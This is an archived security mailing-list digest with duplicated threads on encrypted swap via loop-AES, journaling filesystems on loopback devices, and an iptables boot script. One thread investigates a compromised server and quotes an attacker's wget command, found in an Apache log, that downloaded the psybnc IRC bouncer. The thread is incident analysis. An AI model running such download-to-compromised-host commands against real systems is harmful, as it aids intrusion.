Crypto-Swap questions
Hello, Following loosely this document: http://www.sdc.org/~leila/usb-dongle/readme.html I have set up (or tried) to encrypt my swap partition (/dev/hda2). Here is what I did: * create /usr/local/sbin/crypto-swap (modified!) #!/bin/sh # Run this script somewhere in your startup scripts _after_ # random number generator has been initialized and /usr has # been mounted. (md5sum, uuencode, tail and head programs usually # reside in /usr/bin/) +# insert cypher module into kernel + modprobe aes # encrypted swap partition SWAPDEVICE=/dev/hda2 # loop device name LOOPDEV=/dev/loop6 MD=`dd if=${SWAPDEVICE} bs=4k count=10 2/dev/null | md5sum` for X in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ; do dd if=/dev/zero of=${SWAPDEVICE} bs=4k count=10 \ conv=notrunc 2/dev/null sync done UR=`dd if=/dev/urandom bs=18 count=1 2/dev/null \ |uuencode -m - | head -n 2 | tail-n 1` +echo ${MD}${UR} | losetup -p 0 -e aes -k 256 ${LOOPDEV}${SWAPDEVICE} -echo ${MD}${UR} | losetup -p 0-e aes-256-cbc${LOOPDEV} ${SWAPDEVICE} MD= UR= dd if=/dev/zero of=${LOOPDEV} bs=4k count=10 conv=notrunc 2/dev/null sync mkswap ${LOOPDEV} sync swapon ${LOOPDEV} -- chmod 700 /usr/local/sbin/crypto-swap * wipe -k /dev/hda2 * crypto-swap -- works! * edit /etc/init.d/checkroot.sh: + outcomment: [ $VERBOSE != no ] echo Activating swap. swapon -a 2 /dev/null + REPLACE WITH: [ $VERBOSE != no ] echo Activating CRYPTO-swap. /usr/local/sbin/crypto-swap Upon inspection of dmesg I see the following: Adding 1461904k swap on /dev/loop6. Priority:-1 extents:1 Looks good, no? However, a little further I read: Unable to find swap-space signature 'cat /proc/swaps' gives me this output: Filename TypeSizeUsedPriority /dev/loop6 partition 1461904 0 -1 I would greatly appreciate if someone could give me any insight into whether I now have encrypted swap or not. Also: do people have benchmarks how much this procedure might slow things down? Is the encryptionloop significantly slower than diskwrite/read speed? Thanks for any hints - Joh -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: 2.6.1 CryptoAPI woes
I feel this is kind of over my head ... to boil it down: does it even make sense to run reiserfs inside a loopback partition? Thanks, Joh On Wed, 21 Jan 2004 01:34:25 -0400 Peter Cordes [EMAIL PROTECTED] wrote: On Tue, Jan 20, 2004 at 11:58:41PM -0500, Hubert Chan wrote: Johannes == Johannes Graumann [EMAIL PROTECTED] writes: [...] Johannes And on another note: in Johannes http://www.mirrors.wiretapped.net/security/cryptography/filesystems/loop-aes/loop-AES.README Johannes I read the following: Don't use a journaling file system on Johannes top of file backed loop device, unless underlying file system Johannes is journaled and guarantees data=ordered or data=journal. Johannes Can anybody comment on whether I can use reiserfs on top of my Johannes loopback? The comment has nothing to do with whether or not your encrypted filesystem is a journaling filesystem with or without data=ordered. Actually, it does. It has to do with using a file-backed loop device (versus partition-backed loop device), where the file is sitting on a journaling filesystem. If your loop device is a partition, or is file-based, but sits on top of a non-journaled filesystem Wait a second; I think this one doesn't belong in the list of things that will be correct. or a journaled filesystem with data=ordered or journaled, then you can use any filesystem without problems. (Or, at least, you won't (shouldn't) run into any problems other than what you might run into if it were not on a loopback device.) Basically, if you don't have data=ordered, or data=journaled, any system crash could completely screw up your entire loopback, rendering it completely unusable. If you don't plan on having any system crashes or hard reboots, I think you can still run a loopback on top a non-data=ordered journaled filesystem fairly safely. No, the point is that journaling file systems depend on stuff being written to disk in the order they want, so if something goes wrong at _any_ moment, they can pick up the pieces. ext3 with data=writeback, for example, only bothers to strictly control the order of metadata. A loopback to a file on such a filesystem will not preserve write ordering, so a journaling filesystem on top of it will be making false assumptions. Filesystem metadata (which needs to be ordered) is just data on the loopback device. However, if the underlying filesystem preserves data ordering, it can satisfy the requirements of the journaling filesystem that's on top of it. I'm not sure if you need data=journal on the underlying filesystem for data=journal on the loopback filesystem to make sense, but I don't think so. -- #define X(x,y) x##y Peter Cordes ; e-mail: X([EMAIL PROTECTED] , des.ca) The gods confound the man who first found out how to distinguish the hours! Confound him, too, who in this place set up a sundial, to cut and hack my day so wretchedly into small pieces! -- Plautus, 200 BC -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange apache error.log entry
Jan Minar wrote: On Wed, Jan 21, 2004 at 01:28:32AM +0100, Markus Schabel wrote: I don't know what the surrounding lines are, but the core of your posting is a wget(1) logfile/stderr output :-) This isn't the standard wget in the main distribution; IIRC, it's the busybox' one. Busybox' small footprint makes it ideal for floppy-based distros rescue disks (such as Debian boot-floppies). sure, i know what wget is ;-) the interesting thing is that these lines are in the apache log-file (the surrounding two lines belong to apache) best regards /var/log/apache/error.log: [Sun Jan 18 14:54:35 2004] [error] [client 80.142.221.116] File does not exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg Beginning of wget output: --14:59:21-- http://www.geocities.com/fonias28/psybnc.tgz snip 14:59:24 (273.38 KB/s) - `psybnc.tgz' saved [577509/577509] End of wget output (maybe the following blank line belongs to it, too). [Sun Jan 18 15:23:42 2004] [error] [client 217.24.233.220] File does not exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange apache error.log entry
François TOURDE wrote: Le 12438ième jour après Epoch, [EMAIL PROTECTED] écrivait: Hi, can you tell me what the following means in an apache error.log and The log is the out put of wget command.Most probably the command which resulted in this entry is wget http://www.geocities.com/fonias28/psybnc.tgz -o /var/log/apache/error.log Or just a php script allowing execution of commands, then wget was launched this way... Check your machine, it can be compromised :) I already know that the machine got compromised, I came across these log lines while searching which hole was used... best regards markus -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: 2.6.1 CryptoAPI woes
On Tue, Jan 20, 2004 at 11:07:51PM -0800, Johannes Graumann wrote: I feel this is kind of over my head ... to boil it down: does it even make sense to run reiserfs inside a loopback partition? Yes, if the file you're looping back to is on a journalled filesystem, or is a partition. (ext3 is fine, but you need to patch reiserfs for ordered data.) -- #define X(x,y) x##y Peter Cordes ; e-mail: X([EMAIL PROTECTED] , des.ca) The gods confound the man who first found out how to distinguish the hours! Confound him, too, who in this place set up a sundial, to cut and hack my day so wretchedly into small pieces! -- Plautus, 200 BC signature.asc Description: Digital signature
Re: strange apache error.log entry
On Wed, Jan 21, 2004 at 12:04:58PM +1100, Russell Coker wrote: Looks like they used wget to download psybnc, it's an IRC bot. No, psybnc is an IRC bouncer and the archive includes a binary and the sources: | $ file psybnc | psybnc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, statically linked, stripped So i assume its a script kiddy which wants to abuse several IRC servers. Bastian -- Superior ability breeds superior ambition. -- Spock, Space Seed, stardate 3141.9 signature.asc Description: Digital signature
Re: Crypto-Swap questions
On Tue, Jan 20, 2004 at 10:53:10PM -0800, Johannes Graumann wrote: Is the encryptionloop significantly slower than diskwrite/read speed? No, but it uses CPU, and disk I/O doesn't (when using dma: with IDE, use hdparm -v /dev/hda to check. With SCSI, well, you bought it so you wouldn't have to worry about crap like that. :) -- #define X(x,y) x##y Peter Cordes ; e-mail: X([EMAIL PROTECTED] , des.ca) The gods confound the man who first found out how to distinguish the hours! Confound him, too, who in this place set up a sundial, to cut and hack my day so wretchedly into small pieces! -- Plautus, 200 BC signature.asc Description: Digital signature
subscribe
-- -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org mQGiBDvcCvERBAD6wb5wTnnHT2mqikeu91PdHSR+fGOOdtqTz638CFNupGw7yF9q Cljs7koC5aN8cF3Zusy40XE4vtpoHUzYR4WZkRNh66wq2XUqWbfDnaCDGZmv8UKi lsfklAUugCLHwr2moViimViDZJrHB4vrvs0EejR93iiKJtej5Rd389306wCg1a4c c4j/f8l5zbg57B5JW64NeEcEAL+6ogQsFNz5RGZjo3gpXrDMUhMxS41wtxLQBctR kC1+dSLJV21Ct2+11DO855vjfJ6s6vc/gzfsJpJNebjlzhei8TlTnq6scRFy2dqq TxcT+KCae/TRt0EtMZmIcwNT/BlCL6Hu0tq1qYHlDNEH4LPYWxc2VBH8umdKdFsc EKLiBADaklj0JNiYuMZ/a8Ten1ZiOaYZtJpwBIs40VIzC8tV4mNaWUTyKdwIJ5y0 AgsH4NvE59O/tNdFKKjeAJZkXJ+TfSCUAiSMU+qVwnj7qFp6bWbb4fQC9QACfReY EEof4PlcfD5wNHt0OgG9Ld/N/WmqQVXcD9hUlPyhzUEZa85tx7QgSm9oYW5uZXMg V2Vpc3MgPHdlaXNzaUB0dXg0dS5kZT6IVwQTEQIAFwUCO9wK8QULBwoDBAMVAwID FgIBAheAAAoJEN5ZFZLy/RaXLuYAoKuYhpALoUZri+Ot6s/jZbVr6C5VAKCdWoxR MKnsBhTswupXig0zWTmbArkBDQQ73AsHEAQA349UY31h4Mm5pus5E24i6iavwfQb 5oH4SOmI63f/5K1uh2NNzc/D2kQHc1C2bLabGtMClodntSEH2gSSp7hVuQsoWlMp U+3XazP+nu43NP5EAqnF6/2XyQZDCkHeCKMFNzdGE2MohGXFgt0r0BHgidKbhX98 lt8uv9iIt630xSMAAwUEAJfhYru1cUnLX7TUHm23UaD3Jbb91kYhvnjByGgwOKP7 DAgp0RShMPXRTVDjjm04hD0tPFPa72IB+o+LI2Z0fP4LSSiz3+iSCG+xzsIAURNU +wjkPckg/lF246Kp8SSmObWhFtbykhB1RCs2XskWgnfyUoiXfROejIIYxb2WUyOb iEYEGBECAAYFAjvcCwcACgkQ3lkVkvL9FpetdwCfaeGpZK4bXTgQTLpTaWPCpaEA 6bQAn3fCp58k0bqtMOFuHA0BolXG+eNJ =RF52 -END PGP PUBLIC KEY BLOCK- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: 2.6.1 CryptoAPI woes
On Wed, 21 Jan 2004 05:12:18 -0400 Peter Cordes [EMAIL PROTECTED] wrote: On Tue, Jan 20, 2004 at 11:07:51PM -0800, Johannes Graumann wrote: I feel this is kind of over my head ... to boil it down: does it even make sense to run reiserfs inside a loopback partition? Yes, if the file you're looping back to is on a journalled filesystem, or is a partition. (ext3 is fine, but you need to patch reiserfs for ordered data.) OK, I'm using a partition - will stick with ext3 for now to circumvent patching. I'm sufficiently fighting with the swsuspend2 patch ;0) Thanks! Joh -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
get error: /bin/sh: line1: myfilter: command in boot messages...
specically I have a /bin/sh script in /etc/network/if-pre-up.d/myfilter: #! /bin/sh iptables -X iptables -F iptables -A OUTPUT -p tcp --destination-port telnet -j REJECT which DOES work. I wonder why it's complaining about the line #! /bin/sh during the boot messages. Note no such output is in dmesg. NOTE if I take it out it completely fails... -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: get error: /bin/sh: line1: myfilter: command in boot messages...
On Wed, Jan 21, 2004 at 02:11:39PM -0500, Walter Tautz wrote: #! /bin/sh [...] which DOES work. I wonder why it's complaining about the line #! /bin/sh during the boot messages. Note no such output is in dmesg. Hi, ever tried the line #!/bin/sh ? all my scripts seem to lack the space. hope I'm right :-) Horst. -- Join the army, see the world, meet interesting, exciting people, and kill them. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
information security trends and patterns for 2003
By studying messages on various information security mailing lists, I've created a visual depiction of INFOSEC community trends over time. You can view my report at:http://www.sharp-ideas.net/research/infosec_zeitgeist.html If you'd like to leave me comments, you can post them to my blog at:http://www.sharp-ideas.net/archives/16.html#more Cheers,Abe Usher, CISSP
Crypto-Swap questions
Hello, Following loosely this document: http://www.sdc.org/~leila/usb-dongle/readme.html I have set up (or tried) to encrypt my swap partition (/dev/hda2). Here is what I did: * create /usr/local/sbin/crypto-swap (modified!) #!/bin/sh # Run this script somewhere in your startup scripts _after_ # random number generator has been initialized and /usr has # been mounted. (md5sum, uuencode, tail and head programs usually # reside in /usr/bin/) +# insert cypher module into kernel + modprobe aes # encrypted swap partition SWAPDEVICE=/dev/hda2 # loop device name LOOPDEV=/dev/loop6 MD=`dd if=${SWAPDEVICE} bs=4k count=10 2/dev/null | md5sum` for X in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ; do dd if=/dev/zero of=${SWAPDEVICE} bs=4k count=10 \ conv=notrunc 2/dev/null sync done UR=`dd if=/dev/urandom bs=18 count=1 2/dev/null \ |uuencode -m - | head -n 2 | tail-n 1` +echo ${MD}${UR} | losetup -p 0 -e aes -k 256 ${LOOPDEV}${SWAPDEVICE} -echo ${MD}${UR} | losetup -p 0-e aes-256-cbc${LOOPDEV} ${SWAPDEVICE} MD= UR= dd if=/dev/zero of=${LOOPDEV} bs=4k count=10 conv=notrunc 2/dev/null sync mkswap ${LOOPDEV} sync swapon ${LOOPDEV} -- chmod 700 /usr/local/sbin/crypto-swap * wipe -k /dev/hda2 * crypto-swap -- works! * edit /etc/init.d/checkroot.sh: + outcomment: [ $VERBOSE != no ] echo Activating swap. swapon -a 2 /dev/null + REPLACE WITH: [ $VERBOSE != no ] echo Activating CRYPTO-swap. /usr/local/sbin/crypto-swap Upon inspection of dmesg I see the following: Adding 1461904k swap on /dev/loop6. Priority:-1 extents:1 Looks good, no? However, a little further I read: Unable to find swap-space signature 'cat /proc/swaps' gives me this output: Filename TypeSizeUsedPriority /dev/loop6 partition 1461904 0 -1 I would greatly appreciate if someone could give me any insight into whether I now have encrypted swap or not. Also: do people have benchmarks how much this procedure might slow things down? Is the encryptionloop significantly slower than diskwrite/read speed? Thanks for any hints - Joh
Re: 2.6.1 CryptoAPI woes
I feel this is kind of over my head ... to boil it down: does it even make sense to run reiserfs inside a loopback partition? Thanks, Joh On Wed, 21 Jan 2004 01:34:25 -0400 Peter Cordes [EMAIL PROTECTED] wrote: On Tue, Jan 20, 2004 at 11:58:41PM -0500, Hubert Chan wrote: Johannes == Johannes Graumann [EMAIL PROTECTED] writes: [...] Johannes And on another note: in Johannes http://www.mirrors.wiretapped.net/security/cryptography/filesystems/loop-aes/loop-AES.README Johannes I read the following: Don't use a journaling file system on Johannes top of file backed loop device, unless underlying file system Johannes is journaled and guarantees data=ordered or data=journal. Johannes Can anybody comment on whether I can use reiserfs on top of my Johannes loopback? The comment has nothing to do with whether or not your encrypted filesystem is a journaling filesystem with or without data=ordered. Actually, it does. It has to do with using a file-backed loop device (versus partition-backed loop device), where the file is sitting on a journaling filesystem. If your loop device is a partition, or is file-based, but sits on top of a non-journaled filesystem Wait a second; I think this one doesn't belong in the list of things that will be correct. or a journaled filesystem with data=ordered or journaled, then you can use any filesystem without problems. (Or, at least, you won't (shouldn't) run into any problems other than what you might run into if it were not on a loopback device.) Basically, if you don't have data=ordered, or data=journaled, any system crash could completely screw up your entire loopback, rendering it completely unusable. If you don't plan on having any system crashes or hard reboots, I think you can still run a loopback on top a non-data=ordered journaled filesystem fairly safely. No, the point is that journaling file systems depend on stuff being written to disk in the order they want, so if something goes wrong at _any_ moment, they can pick up the pieces. ext3 with data=writeback, for example, only bothers to strictly control the order of metadata. A loopback to a file on such a filesystem will not preserve write ordering, so a journaling filesystem on top of it will be making false assumptions. Filesystem metadata (which needs to be ordered) is just data on the loopback device. However, if the underlying filesystem preserves data ordering, it can satisfy the requirements of the journaling filesystem that's on top of it. I'm not sure if you need data=journal on the underlying filesystem for data=journal on the loopback filesystem to make sense, but I don't think so. -- #define X(x,y) x##y Peter Cordes ; e-mail: X([EMAIL PROTECTED] , des.ca) The gods confound the man who first found out how to distinguish the hours! Confound him, too, who in this place set up a sundial, to cut and hack my day so wretchedly into small pieces! -- Plautus, 200 BC
Re: strange apache error.log entry
Jan Minar wrote: On Wed, Jan 21, 2004 at 01:28:32AM +0100, Markus Schabel wrote: I don't know what the surrounding lines are, but the core of your posting is a wget(1) logfile/stderr output :-) This isn't the standard wget in the main distribution; IIRC, it's the busybox' one. Busybox' small footprint makes it ideal for floppy-based distros rescue disks (such as Debian boot-floppies). sure, i know what wget is ;-) the interesting thing is that these lines are in the apache log-file (the surrounding two lines belong to apache) best regards /var/log/apache/error.log: [Sun Jan 18 14:54:35 2004] [error] [client 80.142.221.116] File does not exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg Beginning of wget output: --14:59:21-- http://www.geocities.com/fonias28/psybnc.tgz snip 14:59:24 (273.38 KB/s) - `psybnc.tgz' saved [577509/577509] End of wget output (maybe the following blank line belongs to it, too). [Sun Jan 18 15:23:42 2004] [error] [client 217.24.233.220] File does not exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg
Re: strange apache error.log entry
François TOURDE wrote: Le 12438ième jour après Epoch, [EMAIL PROTECTED] écrivait: Hi, can you tell me what the following means in an apache error.log and The log is the out put of wget command.Most probably the command which resulted in this entry is wget http://www.geocities.com/fonias28/psybnc.tgz -o /var/log/apache/error.log Or just a php script allowing execution of commands, then wget was launched this way... Check your machine, it can be compromised :) I already know that the machine got compromised, I came across these log lines while searching which hole was used... best regards markus
Re: 2.6.1 CryptoAPI woes
On Tue, Jan 20, 2004 at 11:07:51PM -0800, Johannes Graumann wrote: I feel this is kind of over my head ... to boil it down: does it even make sense to run reiserfs inside a loopback partition? Yes, if the file you're looping back to is on a journalled filesystem, or is a partition. (ext3 is fine, but you need to patch reiserfs for ordered data.) -- #define X(x,y) x##y Peter Cordes ; e-mail: X([EMAIL PROTECTED] , des.ca) The gods confound the man who first found out how to distinguish the hours! Confound him, too, who in this place set up a sundial, to cut and hack my day so wretchedly into small pieces! -- Plautus, 200 BC signature.asc Description: Digital signature
Re: strange apache error.log entry
On Wed, Jan 21, 2004 at 12:04:58PM +1100, Russell Coker wrote: Looks like they used wget to download psybnc, it's an IRC bot. No, psybnc is an IRC bouncer and the archive includes a binary and the sources: | $ file psybnc | psybnc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, statically linked, stripped So i assume its a script kiddy which wants to abuse several IRC servers. Bastian -- Superior ability breeds superior ambition. -- Spock, Space Seed, stardate 3141.9 signature.asc Description: Digital signature
subscribe
-- -BEGIN PGP PUBLIC KEY BLOCK- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org mQGiBDvcCvERBAD6wb5wTnnHT2mqikeu91PdHSR+fGOOdtqTz638CFNupGw7yF9q Cljs7koC5aN8cF3Zusy40XE4vtpoHUzYR4WZkRNh66wq2XUqWbfDnaCDGZmv8UKi lsfklAUugCLHwr2moViimViDZJrHB4vrvs0EejR93iiKJtej5Rd389306wCg1a4c c4j/f8l5zbg57B5JW64NeEcEAL+6ogQsFNz5RGZjo3gpXrDMUhMxS41wtxLQBctR kC1+dSLJV21Ct2+11DO855vjfJ6s6vc/gzfsJpJNebjlzhei8TlTnq6scRFy2dqq TxcT+KCae/TRt0EtMZmIcwNT/BlCL6Hu0tq1qYHlDNEH4LPYWxc2VBH8umdKdFsc EKLiBADaklj0JNiYuMZ/a8Ten1ZiOaYZtJpwBIs40VIzC8tV4mNaWUTyKdwIJ5y0 AgsH4NvE59O/tNdFKKjeAJZkXJ+TfSCUAiSMU+qVwnj7qFp6bWbb4fQC9QACfReY EEof4PlcfD5wNHt0OgG9Ld/N/WmqQVXcD9hUlPyhzUEZa85tx7QgSm9oYW5uZXMg V2Vpc3MgPHdlaXNzaUB0dXg0dS5kZT6IVwQTEQIAFwUCO9wK8QULBwoDBAMVAwID FgIBAheAAAoJEN5ZFZLy/RaXLuYAoKuYhpALoUZri+Ot6s/jZbVr6C5VAKCdWoxR MKnsBhTswupXig0zWTmbArkBDQQ73AsHEAQA349UY31h4Mm5pus5E24i6iavwfQb 5oH4SOmI63f/5K1uh2NNzc/D2kQHc1C2bLabGtMClodntSEH2gSSp7hVuQsoWlMp U+3XazP+nu43NP5EAqnF6/2XyQZDCkHeCKMFNzdGE2MohGXFgt0r0BHgidKbhX98 lt8uv9iIt630xSMAAwUEAJfhYru1cUnLX7TUHm23UaD3Jbb91kYhvnjByGgwOKP7 DAgp0RShMPXRTVDjjm04hD0tPFPa72IB+o+LI2Z0fP4LSSiz3+iSCG+xzsIAURNU +wjkPckg/lF246Kp8SSmObWhFtbykhB1RCs2XskWgnfyUoiXfROejIIYxb2WUyOb iEYEGBECAAYFAjvcCwcACgkQ3lkVkvL9FpetdwCfaeGpZK4bXTgQTLpTaWPCpaEA 6bQAn3fCp58k0bqtMOFuHA0BolXG+eNJ =RF52 -END PGP PUBLIC KEY BLOCK-
Re: 2.6.1 CryptoAPI woes
On Wed, 21 Jan 2004 05:12:18 -0400 Peter Cordes [EMAIL PROTECTED] wrote: On Tue, Jan 20, 2004 at 11:07:51PM -0800, Johannes Graumann wrote: I feel this is kind of over my head ... to boil it down: does it even make sense to run reiserfs inside a loopback partition? Yes, if the file you're looping back to is on a journalled filesystem, or is a partition. (ext3 is fine, but you need to patch reiserfs for ordered data.) OK, I'm using a partition - will stick with ext3 for now to circumvent patching. I'm sufficiently fighting with the swsuspend2 patch ;0) Thanks! Joh
get error: /bin/sh: line1: myfilter: command in boot messages...
specically I have a /bin/sh script in /etc/network/if-pre-up.d/myfilter: #! /bin/sh iptables -X iptables -F iptables -A OUTPUT -p tcp --destination-port telnet -j REJECT which DOES work. I wonder why it's complaining about the line #! /bin/sh during the boot messages. Note no such output is in dmesg. NOTE if I take it out it completely fails...
Re: get error: /bin/sh: line1: myfilter: command in boot messages...
On Wed, Jan 21, 2004 at 02:11:39PM -0500, Walter Tautz wrote: #! /bin/sh [...] which DOES work. I wonder why it's complaining about the line #! /bin/sh during the boot messages. Note no such output is in dmesg. Hi, ever tried the line #!/bin/sh ? all my scripts seem to lack the space. hope I'm right :-) Horst. -- Join the army, see the world, meet interesting, exciting people, and kill them.
Re: 2.6.1 CryptoAPI woes
On Wed, Jan 21, 2004 at 05:12:18AM -0400, Peter Cordes wrote: On Tue, Jan 20, 2004 at 11:07:51PM -0800, Johannes Graumann wrote: I feel this is kind of over my head ... to boil it down: does it even make sense to run reiserfs inside a loopback partition? Yes, if the file you're looping back to is on a journalled filesystem, or is a partition. Does keeping the log off the loopbacked file make any difference? bit, adam -- Am I a cleric? | 1024D/37B8D989 Or maybe a sinner? | 954B 998A E5F5 BA2A 3622 Unbeliever?| 82DD 54C2 843D 37B8 D989 Renegade? | http://sks.dnsalias.net
Re: get error: /bin/sh: line1: myfilter: command in boot messages...
On Wed, Jan 21, 2004 at 02:11:39PM -0500, Walter Tautz wrote: specically I have a /bin/sh script in /etc/network/if-pre-up.d/myfilter: #! /bin/sh [...] which DOES work. I wonder why it's complaining about the line #! /bin/sh during the boot messages. Note no such output is in dmesg. The shebang bites again :) Here's some reading on it: http://www.in-ulm.de/~mascheck/various/shebang/ Thanks . Siggy